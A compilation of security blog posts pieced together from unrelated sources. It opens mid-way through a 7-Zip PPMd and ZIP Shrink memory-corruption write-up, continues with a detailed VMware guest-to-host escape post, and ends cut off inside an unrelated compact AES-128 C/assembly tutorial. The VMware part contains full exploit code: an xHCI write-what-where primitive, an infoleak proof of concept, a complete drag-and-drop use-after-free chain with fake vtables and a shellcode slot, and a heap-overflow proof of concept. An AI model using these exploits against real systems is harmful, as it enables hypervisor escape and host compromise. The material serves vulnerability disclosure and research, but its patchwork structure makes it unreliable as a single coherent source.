Finally, note that the attacker can overflow the stack buffer with pointers to data that is highly attacker controlled itself.

Triggering a Heap Buffer Overflow

Building on the previous section, we now want to corrupt the heap. Perhaps not surprisingly, it is also possible to read the Stats array out of bound without overflowing the stack buffer ps. This allows us to let s point to a CPpmd_State with attacker controlled data. Moreover, p->FoundState may be one of the ps states, and the model updating process assumes that the Stats array of p->MinContext as well as its suffix contexts contains the symbol p->FoundState->Symbol.

This code fragment is part of the function UpdateModel:

do { s++; } while (s->Symbol != p->FoundState->Symbol);
if (s[0].Freq >= s[-1].Freq) {
  SwapStates(&s[0], &s[-1]);
  s--;
}

Again, there is no bound check on the Stats array, so the pointer s can easily be moved over the end of the allocated heap buffer. Optimally, we would construct our input such that s is out of bound and s-1 within the allocated pool, allowing an attacker controlled heap corruption.
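Incidentally, this search is a good example of where the out-of-bound checks recommended at the end of this section would help. A hedged sketch of such a check (not 7-Zip’s actual code), assuming ctx is the context whose Stats array is being walked and that the caller treats a negative return value as a data error:

// Hedged hardening sketch only; not 7-Zip's actual fix.
CPpmd_State *stats = Ppmd7_GetStats(p, ctx);
CPpmd_State *end = stats + ctx->NumStats;
do { s++; } while (s < end && s->Symbol != p->FoundState->Symbol);
if (s == end)
  return -1;   // symbol not present: the model invariant is broken, abort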

On Attacker Control, Exploitation and Mitigation

The 7-Zip binaries for Windows are shipped with neither the /NXCOMPAT nor the /DYNAMICBASE flags. This means effectively that 7-Zip runs without ASLR on all Windows systems, and DEP is only enabled on Windows x64 or on Windows 10 x86. For example, the following screenshot shows the most recent 7-Zip 18.00 running on a fully updated Windows 8.1 x86:

[Screenshot: 7-Zip 18.00 in Process Explorer on Windows 8.1 x86]

Moreover, 7-Zip is compiled without /GS flag, so there are no stack canaries.

Since there are various ways to corrupt the stack and the heap in highly attacker controlled ways, exploitation for remote code execution is straightforward, especially if no DEP is used.

I have discussed this issue with Igor Pavlov and tried to convince him to enable all three flags. However, he refused to enable /DYNAMICBASE because he prefers to ship the binaries without relocation table to achieve a minimal binary size. Moreover, he doesn’t want to enable /GS, because it could affect the runtime as well as the binary size. At least he will try to enable /NXCOMPAT for the next release. Apparently, it is currently not enabled because 7-Zip is linked with an obsolete linker that doesn’t support the flag.

Conclusion

The outlined heap and stack memory corruptions are only scratching the surface of possible exploitation paths. Most likely there are many other and possibly even neater ways of causing memory corruptions in an attacker controlled fashion.

This bug demonstrates again how difficult it can be to integrate external code into an existing code base. In particular, handling exceptions correctly and understanding the control flow they induce can be challenging.

In the post about Bitdefender’s PPMd stack buffer overflow, I already made clear that the PPMd code is very fragile. A slight misuse of its API, or a tiny mistake while integrating it into another code base may lead to multiple dangerous memory corruptions.

If you use Shkarin’s PPMd implementation, I would strongly recommend hardening it by adding out of bound checks wherever possible, and making sure the basic model invariants always hold. Moreover, in case exceptions are used, one could add an additional error flag to the model that is set to true before updating the model, and only set to false after the update has been successfully completed. This should significantly mitigate the danger of corrupting the model state.
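To make the last suggestion concrete, here is a rough sketch of the error-flag idea in C. The Corrupted field and the wrapper are hypothetical additions, not part of the actual PPMd API; the point is merely that a flag set before the update and cleared only on success survives an exception that unwinds out of the decoder:

/* Hedged sketch; "Corrupted" is a hypothetical field added to the model. */
static int Ppmd7_DecodeSymbol_Guarded(CPpmd7 *p, IPpmd7_RangeDec *rc)
{
  if (p->Corrupted)
    return -2;        /* a previous update was interrupted: refuse to continue */
  p->Corrupted = 1;   /* stays set if an exception unwinds mid-update          */
  int sym = Ppmd7_DecodeSymbol(p, rc);
  p->Corrupted = 0;   /* decode and model update finished cleanly              */
  return sym;
}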

ZIP Shrink: Heap Buffer Overflow (CVE-2017-17969)

Let us proceed by discussing the other bug, which concerns ZIP Shrink. Shrink is an implementation of the Lempel-Ziv-Welch (LZW) compression algorithm. It has been used by PKWARE’s PKZIP before version 2.0, which was released in 1993 (sic!). In fact, shrink is so old and so rarely used that already in 2005, when Igor Pavlov wrote 7-Zip’s shrink decoder, he had a hard time finding sample archives to test the code.

In essence, shrink is LZW with a dynamic code size between 9 and 13 bits, and a special feature that allows partially clearing the dictionary.

7-Zip’s shrink decoder is quite straightforward and easy to understand. In fact, it consists of only 200 lines of code. Nevertheless, it contains a buffer overflow bug.

The Bug

The shrink model’s state essentially only consists of the two arrays _parents and _suffixes, which store the LZW dictionary in a space efficient way. Moreover, there is a buffer _stack to which the current sequence is written:

  UInt16 _parents[kNumItems];
  Byte _suffixes[kNumItems];
  Byte _stack[kNumItems];

The following code fragment is part of the method NCompress::NShrink::CDecoder::CodeReal:

unsigned cur = sym;
unsigned i = 0;
while (cur >= 256) {
  _stack[i++] = _suffixes[cur];
  cur = _parents[cur];
}

Observe that there is no bound check on the value of i.

One way this can be exploited to overflow the heap buffer _stack is by constructing a sequence of symbols such that the _parents array forms a cycle. This is possible, because the decoder only ensures that a parent node does not link to itself (a cycle of length one). Interestingly, old versions of PKZIP create shrink archives that may contain such self-linked parents, so a compatible implementation should actually accept this (7-Zip 18.00 fixes this).

Moreover, using the special symbol sequence 256,2 one can clear parent nodes in an attacker controlled fashion. A cleared parent node will be set to kNumItems. Since there is no check whether a parent has been cleared or not, the parents array can be accessed out of bound.

This sounds promising, and it is actually possible to construct archives that make the decoder write attacker controlled data out of bound. However, I didn’t find an easy way to do so without ending up in an infinite loop. This matters, because the index i is increased in every iteration of the loop. Hence, an infinite loop will quickly lead to a segmentation fault, making exploitation for code execution very difficult (if not impossible). However, I didn’t spend too much time on this, so maybe it is possible to corrupt the heap without entering an infinite loop after all.
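For reference, bounding the reconstruction loop shown earlier closes both the cycle case and the cleared-parent case. The following is a hedged sketch only, not the actual change that shipped in 7-Zip 18.00:

// Hedged sketch of a bounded variant of the loop above.
unsigned cur = sym;
unsigned i = 0;
while (cur >= 256) {
  if (i >= kNumItems || cur >= kNumItems)
    return S_FALSE;            // cycle or cleared parent: treat as data error
  _stack[i++] = _suffixes[cur];
  cur = _parents[cur];
}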

A bunch of Red Pills: VMware Escapes

Background

VMware is one of the leaders in virtualization nowadays. They offer VMware ESXi for the cloud, and VMware Workstation and Fusion for desktops (Windows, Linux, macOS).
The technology is very well known to the public: it allows users to run unmodified guest “virtual machines”.
Often those virtual machines are not trusted, and they must be isolated.
VMware goes to great lengths to offer this isolation, especially on the ESXi product, where virtual machines of different actors can potentially run on the same hardware, so strong isolation is of paramount importance.

Recently at Pwn2Own a “Virtualization” category was introduced, and VMware has been among the targets since Pwn2Own 2016.

In 2017 we successfully demonstrated a VMware escape from a guest to the host from an unprivileged account, resulting in code execution on the host and breaking out of the virtual machine.

If you escape your virtual machine environment then all isolation assurances are lost, since you are running code on the host, which controls the guests.

But how does VMware work?

In a nutshell, it often uses (though they are not strictly required) CPU and memory hardware virtualization technologies, so a guest virtual machine can run code at native speed most of the time.

But a modern system is not just a CPU and memory; it also requires a lot of other hardware to work properly and be useful.

This point is very important because it constitutes one of the biggest attack surfaces of VMware: the virtualized hardware.

Virtualizing a hardware device is not a trivial task, as is easily appreciated by reading any datasheet describing the hardware/software interface of a PC hardware device.

VMware traps on I/O accesses to such a virtual device and needs to emulate all those low level operations correctly: since it aims to run unmodified kernels, its emulated devices must behave as closely as possible to their real counterparts.

Furthermore, if you have ever used VMware you might have noticed its copy and paste capabilities, and shared folders. How are those implemented?

To summarize, in this blog post we will cover quite a few bugs: several in the “backdoor” functionality that supports those “extra” services such as copy and paste (C&P), and one in a virtualized device.

Although a lot of VMware blog posts and presentations have been released recently, we felt the need to write our own for the following reasons:

  • First, no one has ever talked correctly about our Pwn2Own bugs, so we want to shed light on them.
  • Second, some of those published resources lack either details or code.

So we hope you will enjoy our blogpost!

We will begin with some background information to get you up to speed.

Let’s get started!

Overall architecture

A complex product like VMware consists of several components; we will just highlight the most important ones, since the VMware architecture design has already been discussed extensively elsewhere.

  • VMM: this piece of software runs at the highest possible privilege level on the physical machine. It makes the VMs tick and run, and handles all the tasks which are impossible to perform from host ring 3.
  • vmnat: vmnat is responsible for network packet handling, since VMware offers advanced functionalities such as NAT and virtual networks.
  • vmware-vmx: every virtual machine started on the system has its own vmware-vmx process running on the host. This process handles a lot of tasks which are relevant for this blog post, including much of the device emulation and the backdoor request handling. Exploitation of the chains we will present results in code execution on the host in the context of vmware-vmx.

Backdoor

The so-called backdoor is not actually a “backdoor”; it is simply a mechanism implemented in VMware for guest-host and host-guest communication.

A useful resource for understanding this interface is the open-vm-tools repository by VMware itself.

Basically, at the lowest level, the backdoor consists of 2 I/O ports, 0x5658 and 0x5659: the first for “traditional” communication, the other one for “high bandwidth” communication.

The guest issues in/out instructions on those ports following a specific register convention, and is thereby able to communicate with the VMware process running on the host.

The hypervisor will trap and service the request.
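To make this concrete, here is a minimal user-mode sketch of a “traditional” backdoor request, written for GCC on an x86/x86-64 guest. The magic value 0x564D5868 ('VMXh'), command number 10 (get version) and the register layout are the well-known ones documented in open-vm-tools; treat the snippet as an illustration of the convention rather than production code.

#include <stdint.h>
#include <stdio.h>

/* Minimal sketch of the low-level backdoor convention; run inside a VMware guest. */
int main(void) {
    uint32_t eax = 0x564D5868u;   /* 'VMXh' magic                        */
    uint32_t ebx = 0;             /* command parameter                   */
    uint32_t ecx = 10;            /* command 10: get version             */
    uint32_t edx = 0x5658u;       /* the "traditional" backdoor port     */
    __asm__ __volatile__("inl %%dx, %%eax"
                         : "+a"(eax), "+b"(ebx), "+c"(ecx), "+d"(edx));
    if (ebx == 0x564D5868u)       /* magic echoed back: VMware answered  */
        printf("backdoor present, version = %u\n", eax);
    return 0;
}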

On top of this low level mechanism, VMware implemented some more convenient high level protocols. We encourage you to check the open-vm-tools repository to discover those; since they have been covered extensively elsewhere, we will not spend too much time on the details.
Just to mention a few of those higher level protocols: drag and drop, copy and paste, guestrpc.

The fundamental points to remember are:

  • It’s a guest-to-host interface that we can use.
  • It exposes complex services and functionalities.
  • A lot of these functionalities can be used from ring 3 in the guest VM.

xHCI

xHCI (aka eXtensible Host Controller Interface) is a specification by Intel of a USB host controller (normally implemented in hardware in a regular PC) which supports USB 1.x, 2.0 and 3.x.

You can find the relevant specification here.

On a physical machine it’s often present:

00:14.0 USB controller: Intel Corporation C610/X99 series chipset USB xHCI Host Controller (rev 05)

In VMware this hardware device is emulated, and if you create a Windows 10 virtual machine, this emulated controller is enabled by default, so a guest virtual machine can interact with this particular emulated device.

The interaction, like with a lot of hardware devices, will take place in the PCI memory space and in the IO memory mapped space.

This very low level interface is the one used by the OS kernel driver in order to schedule USB work, receive data, and handle all the other tasks related to USB.

Just by looking at the specification alone, which runs to more than 600 pages, it’s no surprise that this piece of hardware and its interface are very complex, and the specification only covers the interface and the behavior, not the actual implementation.

Now imagine actually emulating this complex hardware. You can imagine it’s a very complex and error prone task, as we will see soon.

Often, to speak directly with the hardware (and consequently also with virtualized hardware), you need to run in ring 0 in the guest. That’s why (as you will see in the next paragraphs) we used a Windows kernel LPE inside the VM.

Mitigations

VMware ships with “baseline” mitigations which are expected in modern software, such as ASLR, stack cookies etc.

More advanced Windows mitigations, such as CFG (Microsoft’s version of Control Flow Integrity) and others, are not deployed at the time of writing.

Pwn2Own 2017: VMware Escape by two bugs in 1 second

Team Sniper (Keen Lab and PC Mgr) targeted VMware Workstation (Guest-to-Host), and the event certainly did not end with a whimper. They used a three-bug chain to win the Virtual Machine Escapes (Guest-to-Host) category with a VMware Workstation exploit. This involved a Windows kernel UAF, a Workstation infoleak, and an uninitialized buffer in Workstation to go guest-to-host. This category ratcheted up the difficulty even further because VMware Tools were not installed in the guest.

The following vulnerabilities were identified and analyzed:

  • XHCI: CVE-2017-4904 (critical): uninitialized stack value leading to arbitrary code execution
  • CVE-2017-4905 (moderate): uninitialized memory read leading to information disclosure

CVE-2017-4904 xHCI uninitialized stack variable

This is an uninitialized variable vulnerability residing in the emulated XHCI device, triggered when updating changes to the Device Context in guest physical memory.

The XHCI reports some status info to system software through the “Device Context” structure. The address of a Device Context is held in the DCBAA (Device Context Base Address Array), whose address is in turn held in the DCBAAP (Device Context Base Address Array Pointer) register. Both the Device Context and the DCBAA reside in physical RAM. The XHCI device keeps an internal cache of the Device Context and only updates the one in physical memory when some changes happen. When updating the Device Context, the virtual machine monitor will map the guest physical memory containing the Device Context into the memory space of the monitor process, then do the update. However, the mapping can fail and leave the result variable untouched. The code does not take precautions against this and directly uses the result as a destination address for a memory write, resulting in an uninitialized variable vulnerability.
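To make the pattern easier to follow, here is an abstract, hypothetical sketch of the bug class. None of these names come from vmware-vmx; map_guest_page simply stands in for whatever mapping routine the monitor uses, and its unchecked failure is what leaves the destination pointer uninitialized:

#include <stdint.h>
#include <string.h>

/* Hypothetical sketch of the bug class only; not vmware-vmx code. */
typedef struct { uint8_t raw[0x40]; } endpoint_ctx_t;

static int map_guest_page(uint64_t guest_pa, void **host_va) {
    (void)guest_pa; (void)host_va;
    return -1;                            /* stand-in: the mapping failed     */
}

void update_device_context(uint64_t guest_pa, const endpoint_ctx_t *cached) {
    void *host_va;                        /* uninitialized stack variable     */
    map_guest_page(guest_pa, &host_va);   /* on failure host_va is left as-is */
    /* the return value is not checked, so a stale stack value (which the
       guest can groom via the Input Context) becomes the write destination */
    memcpy(host_va, cached, sizeof(*cached));
}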

To trigger this bug, the following steps should be taken:

  1. Issue an “Enable Slot” command to the XHCI. Get the resulting slot number from the Event TRB.
  2. Set the DCBAAP to point to a controlled buffer.
  3. Put some invalid physical address, e.g. 0xffffffffffffffff, into the corresponding slot in the DCBAA buffer.
  4. Issue an “Address Device” command. The XHCI will read the base address of the Device Context from the DCBAA into an internal cache; the value is a controlled, invalid address.
  5. Issue a “Configure Endpoint” command. This triggers the bug when the XHCI updates the corresponding Device Context.

The uninitialized variable resides on the stack. Its value can be controlled in the “Configure Endpoint” command with one of the Endpoint Contexts of the Input Context, which is also on the stack. Therefore we can control the destination address of the write. The contents to be written come from the Endpoint Context of the Device Context, which is copied from the corresponding controllable Endpoint Context of the Input Context, resulting in a write-what-where primitive. By combining this with the info leak vulnerability, we can overwrite some function pointers and finally ROP our way to arbitrary code execution.

Exploit code

void write_what_where(uint64 xhci_base, uint64 where, uint64 what)
{
    xhci_cap_regs *cap_regs = (xhci_cap_regs*)xhci_base;
    xhci_op_regs *op_regs = (xhci_op_regs*)(xhci_base + (cap_regs->hc_capbase & 0xff));
    xhci_doorbell_array *db = (xhci_doorbell_array*)(xhci_base + cap_regs->db_off);
    int max_slots = cap_regs->hcs_params1 & 0xf;
    uint8 *playground = (uint8 *)ExAllocatePoolWithTag(NonPagedPool, 0x1000, 'NEEK');
    if (!playground) return;
    playground[0] = 0;
    uint64 *dcbaa = (uint64*)playground;
    playground += sizeof(uint64) * max_slots;
    for (int i = 0; i < max_slots; ++i)
    {
        dcbaa[i] = 0xffffffffffffffc0;
    }
    op_regs->dcbaa_ptr = MmGetPhysicalAddress(dcbaa).QuadPart;
    
    playground = (uint8*)(((uint64)playground + 0x10) & (~0xf));
    input_context *input_ctx = (input_context*)playground;
    
    playground += sizeof(input_context);
    playground = (uint8*)(((uint64)playground + 0x40) & (~0x3f));
    uint8 *cring = playground;
    uint64 cmd_ring = MmGetPhysicalAddress(cring).QuadPart | 1;
    
    trb_t *cmd = (trb_t*)cring;
    memset((void*)cmd, 0, sizeof(trb_t));
    TRB_SET(TT, cmd, TRB_CMD_ENABLE_SLOT);
    TRB_SET(C, cmd, 1);
    cmd++;
    memset(input_ctx, 0, sizeof(input_context));
    input_ctx->ctrl_ctx.drop_flags = 0;
    input_ctx->ctrl_ctx.add_flags = 3;
    input_ctx->slot_ctx.context_entries = 1;
    memset((void*)cmd, 0, sizeof(trb_t));
    TRB_SET(TT, cmd, TRB_CMD_ADDRESS_DEV);
    TRB_SET(ID, cmd, 1);
    TRB_SET(DC, cmd, 1);
    cmd->ptr = MmGetPhysicalAddress(input_ctx).QuadPart;
    TRB_SET(C, cmd, 1);
    cmd++;
    TRB_SET(C, cmd, 0);
    op_regs->cmd_ring = cmd_ring;
    db->doorbell[0] = 0;
    
    cmd = (trb_t*)cring;
    memset(input_ctx, 0, sizeof(input_context));
    input_ctx->ctrl_ctx.drop_flags = 0;
    input_ctx->ctrl_ctx.add_flags = (1u<<31)|(1u<<30);
    input_ctx->slot_ctx.context_entries = 31;
    uint64 *value = (uint64*)(&input_ctx->ep_ctx[30]);
    uint64 *addr = ((uint64*)(&input_ctx->ep_ctx[31])) + 1;
    value[0] = 0;
    value[1] = what;
    value[2] = 0;
    addr[0] = where - 0x3b8;
    memset((void*)cmd, 0, sizeof(trb_t));
    TRB_SET(TT, cmd, TRB_CMD_CONFIGURE_EP);
    TRB_SET(ID, cmd, 1);
    TRB_SET(DC, cmd, 0);
    cmd->ptr = MmGetPhysicalAddress(input_ctx).QuadPart;
    TRB_SET(C, cmd, 1);
    cmd++;
    TRB_SET(C, cmd, 0);
    op_regs->cmd_ring = cmd_ring;
    db->doorbell[0] = 0;
}

CVE-2017-4905 Backdoor uninitialized memory read

This is an uninitialized memory vulnerability present in the Backdoor callback handler. A buffer is allocated on the stack when processing backdoor requests. This buffer should be initialized in the BDOORHB callback, but when requesting invalid commands, the callback fails to properly clear the buffer, causing the uninitialized content of the stack buffer to be leaked to the guest. With this bug we can effectively defeat the ASLR of vmware-vmx running on the host. The success rate of exploiting this bug is 100%.

Credits to JunMao of Tencent PCManager.

PoC

void infoleak()
{
    char *buf = (char *)VirtualAlloc(0, 0x8000, MEM_COMMIT, PAGE_READWRITE);
    memset(buf, 0, 0x8000);
    Backdoor_proto_hb hb;
    memset(&hb, 0, sizeof(Backdoor_proto_hb));
    hb.in.size = 0x8000;
    hb.in.dstAddr = (uintptr_t)buf;
    hb.in.bx.halfs.low = 2;
    Backdoor_HbIn(&hb);
    // buf will be filled with contents leaked from vmware-vmx stack
    // 
    ...
    VirtualFree((void *)buf, 0x8000, MEM_DECOMMIT);
    return;
}

Behind the scenes of Pwn2Own 2017

Exploiting the UAF bug in VMware Workstation Drag n Drop with a single bug

By fuzzing VMware Workstation, we found this bug and completed the whole stable exploit chain using this single bug in the last few days of February 2017. Unfortunately, this bug was patched in VMware Workstation 12.5.3, released on 9 March 2017. Afterwards we noticed that few papers talked about this bug, and VMware did not even assign a CVE ID to it. That’s a pity, because it’s the best bug we have ever seen in VMware Workstation, and VMware just patched it quietly. Now we’re going to talk about the way to exploit VMware Workstation with this single bug.

Exploit Code

The success rate of this exploit is approximately 100%.

char *initial_dnd = "tools.capability.dnd_version 4";
static const int cbObj = 0x100;
char *second_dnd = "tools.capability.dnd_version 2";
char *chgver = "vmx.capability.dnd_version";
char *call_transport = "dnd.transport ";
char *readstring = "ToolsAutoInstallGetParams";
// NOTE: the listing below also refers to tov4, tov2 and dndtransport, which
// are presumably just aliases for the strings above; they are defined as such
// here to keep the listing self-contained.
#define tov4 initial_dnd
#define tov2 second_dnd
#define dndtransport call_transport
typedef struct _DnDCPMsgHdrV4
{
    char magic[14];
    char dummy[2];
    size_t ropper[13];
    char shellcode[175];
    char padding[0x80];
} DnDCPMsgHdrV4;


void PrepareLFH()
{
    char *result = NULL;
    char *pObj = malloc(cbObj);
    memset(pObj, 'A', cbObj);
    pObj[cbObj - 1] = 0;
    for (int idx = 0; idx < 1; ++idx) // just occupy 1
    {
        char *spary = stringf("info-set guestinfo.k%d %s", idx, pObj);
        RpcOut_SendOneRaw(spary, strlen(spary), &result, NULL); //alloc one to occupy 4
    }
    free(pObj);
}

size_t infoleak()
{
#define MAX_LFH_BLOCK 512
    Message_Channel *chans[5] = {0};
    for (int i = 0; i < 5; ++i)
    {
        chans[i] = Message_Open(0x49435052);
        if (chans[i])
        {
            Message_SendSize(chans[i], cbObj - 1); //just alloc
        }
        else
        {
            Message_Close(chans[i - 1]); //keep 1 channel valid
            chans[i - 1] = 0;
            break;
        }
    }
    PrepareLFH(); //make sure we have at least 7 hole or open and occupy next LFH block
    for (int i = 0; i < 5; ++i)
    {
        if (chans[i])
        {
            Message_Close(chans[i]);
        }
    }

    char *result = NULL;
    char *pObj = malloc(cbObj);
    memset(pObj, 'A', cbObj);
    pObj[cbObj - 1] = 0;
    char *spary2 = stringf("guest.upgrader_send_cmd_line_args %s", pObj);
    while (1)
    {
        for (int i = 0; i < MAX_LFH_BLOCK; ++i)
        {
            RpcOut_SendOneRaw(tov4, strlen(tov4), &result, NULL);
            RpcOut_SendOneRaw(chgver, strlen(chgver), &result, NULL);
            RpcOut_SendOneRaw(tov2, strlen(tov2), &result, NULL);
            RpcOut_SendOneRaw(chgver, strlen(chgver), &result, NULL);
        }

        for (int i = 0; i < MAX_LFH_BLOCK; ++i)
        {
            Message_Channel *chan = Message_Open(0x49435052);
            if (chan == NULL)
            {
                puts("Message send error!");
                Sleep(100);
            }
            else
            {
                Message_SendSize(chan, cbObj - 1);
                Message_RawSend(chan, "\xA0\x75", 2); //just ret
                Message_Close(chan);
            }
        }
        Message_Channel *chan = Message_Open(0x49435052);
        Message_SendSize(chan, cbObj - 1);
        Message_RawSend(chan, "\xA0\x74", 2);                                 //free
        RpcOut_SendOneRaw(dndtransport, strlen(dndtransport), &result, NULL); //trigger double free
        for (int i = 0; i < min(cbObj-3,MAX_LFH_BLOCK); ++i)
        {
            RpcOut_SendOneRaw(spary2, strlen(spary2), &result, NULL);
            Message_RawSend(chan, "B", 1);
            RpcOut_SendOneRaw(readstring, strlen(readstring), &result, NULL);
            if (result[0] == 'A' && result[1] == 'A' && strcmp(result, pObj))
            {
               Message_Close(chan); //free the string
                for (int i = 0; i < MAX_LFH_BLOCK; ++i)
                {
                    puts("Trying to leak vtable");
                    RpcOut_SendOneRaw(tov4, strlen(tov4), &result, NULL);
                    RpcOut_SendOneRaw(chgver, strlen(chgver), &result, NULL);
                    RpcOut_SendOneRaw(readstring, strlen(readstring), &result, NULL);
                    size_t p = 0;
                    if (result)
                    {
                        memcpy(&p, result, min(strlen(result), 8));
                        printf("Leak content: %p\n", p);
                    }
                    size_t low = p & 0xFFFF;
                    if (low == 0x74A8 || //RpcBase
                        low == 0x74d0 || //CpV4
                        low == 0x7630)   //DnDV4
                    {
                        printf("vmware-vmx base: %p\n", (p & (~0xFFFF)) - 0x7a0000);
                        return (p & (~0xFFFF)) - 0x7a0000;
                    }
                    RpcOut_SendOneRaw(tov2, strlen(tov2), &result, NULL);
                    RpcOut_SendOneRaw(chgver, strlen(chgver), &result, NULL);
                }
            }
        }
        Message_Close(chan);
    }
    return 0;
}

void exploit(size_t base)
{
    char *result = NULL;
    char *uptime_info = stringf("SetGuestInfo -7-%I64u", 0x41414141);
    char *pObj = malloc(cbObj);
    memset(pObj, 0, cbObj);

    DnDCPMsgHdrV4 *hdr = malloc(sizeof(DnDCPMsgHdrV4));
    memset(hdr, 0, sizeof(DnDCPMsgHdrV4));
    memcpy(hdr->magic, call_transport, strlen(call_transport));
    while (1)
    {
        RpcOut_SendOneRaw(second_dnd, strlen(second_dnd), &result, NULL);
        RpcOut_SendOneRaw(chgver, strlen(chgver), &result, NULL);
        for (int i = 0; i < MAX_LFH_BLOCK; ++i)
        {
            Message_Channel *chan = Message_Open(0x49435052);
            Message_SendSize(chan, cbObj - 1);
            size_t fake_vtable[] = {
                base + 0xB87340,
                base + 0xB87340,
                base + 0xB87340,
                base + 0xB87340};

            memcpy(pObj, &fake_vtable, sizeof(size_t) * 4);

            Message_RawSend(chan, pObj, sizeof(size_t) * 4);
            Message_Close(chan);
        }
        RpcOut_SendOneRaw(uptime_info, strlen(uptime_info), &result, NULL);
        RpcOut_SendOneRaw(hdr, sizeof(DnDCPMsgHdrV4), &result, NULL);
        //check pwn success?
        RpcOut_SendOneRaw(readstring, strlen(readstring), &result, NULL);
        if (*(size_t *)result == 0xdeadbeefc0debabe)
        {
            puts("VMware escape success! \nPwned by KeenLab, Tencent");
            RpcOut_SendOneRaw(initial_dnd, strlen(initial_dnd), &result, NULL);//fix dnd to callable prevent vmtoolsd problem
            RpcOut_SendOneRaw(chgver, strlen(chgver), &result, NULL);
            return;
        }
        //host dndv4 fill in, try to clean up and free again
        Sleep(100);
        puts("Object wrong! Retry...");
        RpcOut_SendOneRaw(initial_dnd, strlen(initial_dnd), &result, NULL);
        RpcOut_SendOneRaw(chgver, strlen(chgver), &result, NULL);
    }
}

int main(int argc, char *argv[])
{
    int ret = 1;
    __try
    {
        while (1)
        {
            size_t base = 0;
            do
            {
                puts("Leaking...");
                base = infoleak();
            } while (!base);
            puts("Pwning...");
            exploit(base);
            break;
        }
    }
    __except (ExceptionIsBackdoor(GetExceptionInformation()) ? EXCEPTION_EXECUTE_HANDLER : EXCEPTION_CONTINUE_SEARCH)
    {
        fprintf(stderr, NOT_VMWARE_ERROR);
        return 1;
    }
    return ret;
}

CVE-2017-4901 DnDv3 HeapOverflow

The drag-and-drop (DnD) function in VMware Workstation and Fusion has an out-of-bounds memory access vulnerability. This may allow a guest to execute code on the operating system that runs Workstation or Fusion.

After VMware released 12.5.3, we continued auditing the DnD functionality and finally found another heap overflow bug similar to CVE-2016-7461. This bug was known to almost every participant in the VMware category at Pwn2Own 2017. Here we present the PoC for this bug.

void poc()
{
    int n;
    char *req1 = "tools.capability.dnd_version 3";
    char *req2 = "vmx.capability.dnd_version";
    RpcOut_SendOneRaw(req1, strlen(req1), NULL, NULL);
    RpcOut_SendOneRaw(req2, strlen(req2), NULL, NULL);

    char req3[0x80] = "dnd.transport ";
    n = strlen(req3);
    *(int*)(req3+n) = 3;
    *(int*)(req3+n+4) = 0;
    *(int*)(req3+n+8) = 0x100;
    *(int*)(req3+n+0xc) = 0;
    *(int*)(req3+n+0x10) = 0;
    // allocate buffer of 0x100 bytes
    RpcOut_SendOneRaw(req3, n+0x14, NULL, NULL);

    char req4[0x1000] = "dnd.transport ";
    n = strlen(req4);
    *(int*)(req4+n) = 3;
    *(int*)(req4+n+4) = 0;
    *(int*)(req4+n+8) = 0x1000;
    *(int*)(req4+n+0xc) = 0x800;
    *(int*)(req4+n+0x10) = 0;
    for (int i = 0; i < 0x800; ++i)
        req4[n+0x14+i] = 'A';
    // overflow with 0x800 bytes of 'A'
    RpcOut_SendOneRaw(req4, n+0x14+0x800, NULL, NULL);
}

Conclusions

In this article we presented several VMware bugs leading to guest to host virtual machine escape.
We hope to have demonstrated that not only are VM breakouts possible and real, but also that a determined attacker can achieve several of them, and with good reliability.
We feel that in our industry there is a misconception that if untrusted software runs inside a VM, then we are safe.
Think about the malware industry, which heavily relies on VMs for analysis, or the entire cloud, which basically runs on hypervisors.
For sure it’s an additional protection layer, raising the bar for an attacker to achieve full compromise, so it’s a very good practice to adopt it.
But we must not forget that essentially it’s just another “layer of sandboxing” which can be bypassed or escaped.
So great care must be taken to secure this layer as well.

AES-128 Block Cipher

Introduction

In January 1997, the National Institute of Standards and Technology (NIST) initiated a process to replace the Data Encryption Standard (DES) published in 1977. A draft criteria to evaluate potential algorithms was published, and members of the public were invited to provide feedback. The finalized criteria was published in September 1997 which outlined a minimum acceptable requirement for each submission.

Four years later, in November 2001, Rijndael, designed by Belgian cryptographers Vincent Rijmen and Joan Daemen and now referred to as the Advanced Encryption Standard (AES), was announced as the winner.

Since publication, implementations of AES have frequently been optimized for speed. Code which executes the quickest has traditionally taken priority over how much ROM it uses. Developers will use lookup tables to accelerate each step of the encryption process, thus compact implementations are rarely if ever sought after.

Our challenge here is to implement AES in the least amount of C and more specifically x86 assembly code. It will obviously result in a slow implementation, and will not be resistant to side-channel analysis, although the latter problem can likely be resolved using conditional move instructions (CMOVcc) if necessary.

AES Parameters

There are three different sets of parameters available, with the main difference related to key length. Our implementation will be AES-128, which fits perfectly onto a 32-bit architecture.

          Key Length   Block Size   Number of Rounds
          (Nk words)   (Nb words)   (Nr)
AES-128        4            4              10
AES-192        6            4              12
AES-256        8            4              14

Structure of AES

Two IF statements are introduced in order to perform the encryption in one loop. What isn’t included in the illustration below is ExpandRoundKey and AddRoundConstant, which generate round keys.

The first layout here is what we normally see used when describing AES. The second introduces 2 conditional statements which makes the code more compact.

Source in C

The optimizers built into C compilers can sometimes reveal more efficient ways to implement a piece of code. At the very least, they will show you alternative ways to write some code in assembly.

#define R(v,n)(((v)>>(n))|((v)<<(32-(n))))
#define F(n)for(i=0;i<n;i++)
typedef unsigned char B;
typedef unsigned W;

// Multiplication over GF(2**8)
W M(W x){
    W t=x&0x80808080;
    return((x^t)*2)^((t>>7)*27);
}
// SubByte
B S(B x){
    B i,y,c;
    if(x){
      for(c=i=0,y=1;--i;y=(!c&&y==x)?c=1:y,y^=M(y));
      x=y;F(4)x^=y=(y<<1)|(y>>7);
    }
    return x^99;
}
void E(B *s){
    W i,w,x[8],c=1,*k=(W*)&x[4];
    
    // copy plain text + master key to x
    F(8)x[i]=((W*)s)[i];
    
    for(;;){
      // 1st part of ExpandRoundKey, AddRoundKey and update state
      w=k[3];F(4)w=(w&-256)|S(w),w=R(w,8),((W*)s)[i]=x[i]^k[i];
      
      // 2nd part of ExpandRoundKey
      w=R(w,8)^c;F(4)w=k[i]^=w;      
      
      // if round 11, stop else update c
      if(c==108)break;c=M(c);      
      
      // SubBytes and ShiftRows
      F(16)((B*)x)[(i%4)+(((i/4)-(i%4))%4)*4]=S(s[i]);
      
      // if not round 10, MixColumns
      if(c!=108)F(4)w=x[i],x[i]=R(w,8)^R(w,16)^R(w,24)^M(R(w,8)^w);
    }
}

x86 Overview

Some x86 registers have special purposes, and it’s important to know this when writing compact code.

Register   Description         Used by
eax        Accumulator         lods, stos, scas, xlat, mul, div
ebx        Base                xlat
ecx        Count               loop, rep (conditional suffixes E/Z and NE/NZ)
edx        Data                cdq, mul, div
esi        Source Index        lods, movs, cmps
edi        Destination Index   stos, movs, scas, cmps
ebp        Base Pointer        enter, leave
esp        Stack Pointer       pushad, popad, push, pop, call, enter, leave

